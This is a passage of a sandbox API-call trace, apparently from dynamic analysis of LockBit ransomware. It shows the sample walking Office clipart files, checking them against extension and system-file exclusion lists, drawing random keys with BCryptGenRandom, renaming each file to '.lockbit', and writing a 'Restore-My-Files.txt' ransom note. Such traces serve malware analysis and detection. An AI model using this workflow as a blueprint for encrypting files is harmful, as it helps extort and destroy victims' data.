ftLastWriteTime.dwLowDateTime=0x16b4eb00, ftLastWriteTime.dwHighDateTime=0x1bd4aea, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00200_.WMF", cAlternateFileName="")) returned 1 [0174.928] lstrcmpiW (lpString1=".", lpString2="SO00200_.WMF") returned -1 [0174.928] lstrcmpiW (lpString1="..", lpString2="SO00200_.WMF") returned -1 [0174.929] PathFindExtensionW (pszPath="SO00200_.WMF") returned=".WMF" [0174.929] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0174.929] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0174.930] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.930] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00200_.WMF") returned -1 [0174.931] lstrcmpiW (lpString1="ntldr", lpString2="SO00200_.WMF") returned -1 [0174.931] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00200_.WMF") returned -1 [0174.931] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00200_.WMF") returned -1 [0174.931] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00200_.WMF") returned -1 [0174.931] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00200_.WMF") returned 1 [0174.931] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00200_.WMF") returned -1 [0174.931] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0174.931] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00200_.WMF") returned=".WMF" [0174.931] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.931] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.931] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0174.932] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0174.932] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00200_.WMF.lockbit") returned 72 [0174.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00200_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0174.937] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.937] malloc (_Size=0x40068) returned 0x3d70450 [0174.937] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10534) returned 1 [0174.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.937] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0174.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0174.938] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0175.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00200_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00200_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.023] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.024] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0175.024] free (_Block=0x1fa2ed8) [0175.024] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00200_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.024] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.024] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd90f00, ftCreationTime.dwHighDateTime=0x1bd4b14, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd90f00, ftLastWriteTime.dwHighDateTime=0x1bd4b14, nFileSizeHigh=0x0, nFileSizeLow=0x2ea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00208_.WMF", cAlternateFileName="")) returned 1 [0175.026] lstrcmpiW (lpString1=".", lpString2="SO00208_.WMF") returned -1 [0175.026] lstrcmpiW (lpString1="..", lpString2="SO00208_.WMF") returned -1 [0175.026] PathFindExtensionW (pszPath="SO00208_.WMF") returned=".WMF" [0175.026] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.026] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.027] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.027] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00208_.WMF") returned -1 [0175.028] lstrcmpiW (lpString1="ntldr", lpString2="SO00208_.WMF") returned -1 [0175.028] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00208_.WMF") returned -1 [0175.028] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00208_.WMF") returned -1 [0175.028] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00208_.WMF") returned -1 [0175.028] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00208_.WMF") returned 1 [0175.028] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00208_.WMF") returned -1 [0175.028] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.028] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00208_.WMF") returned=".WMF" [0175.028] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.028] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.028] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.029] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.029] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00208_.WMF.lockbit") returned 72 [0175.029] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00208_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00208_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.031] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.031] malloc (_Size=0x40068) returned 0x3df0008 [0175.031] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11936) returned 1 [0175.031] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.031] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.032] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.032] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.034] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00208_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00208_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.034] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.034] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.035] free (_Block=0x1fa2ed8) [0175.035] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00208_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.035] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.035] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.036] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b20100, ftCreationTime.dwHighDateTime=0x1bd4b14, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b20100, ftLastWriteTime.dwHighDateTime=0x1bd4b14, nFileSizeHigh=0x0, nFileSizeLow=0x4f72, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00212_.WMF", cAlternateFileName="")) returned 1 [0175.036] lstrcmpiW (lpString1=".", lpString2="SO00212_.WMF") returned -1 [0175.036] lstrcmpiW (lpString1="..", lpString2="SO00212_.WMF") returned -1 [0175.036] PathFindExtensionW (pszPath="SO00212_.WMF") returned=".WMF" [0175.036] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.036] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.037] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.037] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00212_.WMF") returned -1 [0175.038] lstrcmpiW (lpString1="ntldr", lpString2="SO00212_.WMF") returned -1 [0175.038] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00212_.WMF") returned -1 [0175.038] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00212_.WMF") returned -1 [0175.038] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00212_.WMF") returned -1 [0175.038] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00212_.WMF") returned 1 [0175.038] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00212_.WMF") returned -1 [0175.038] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.038] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00212_.WMF") returned=".WMF" [0175.038] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.038] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.038] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.039] 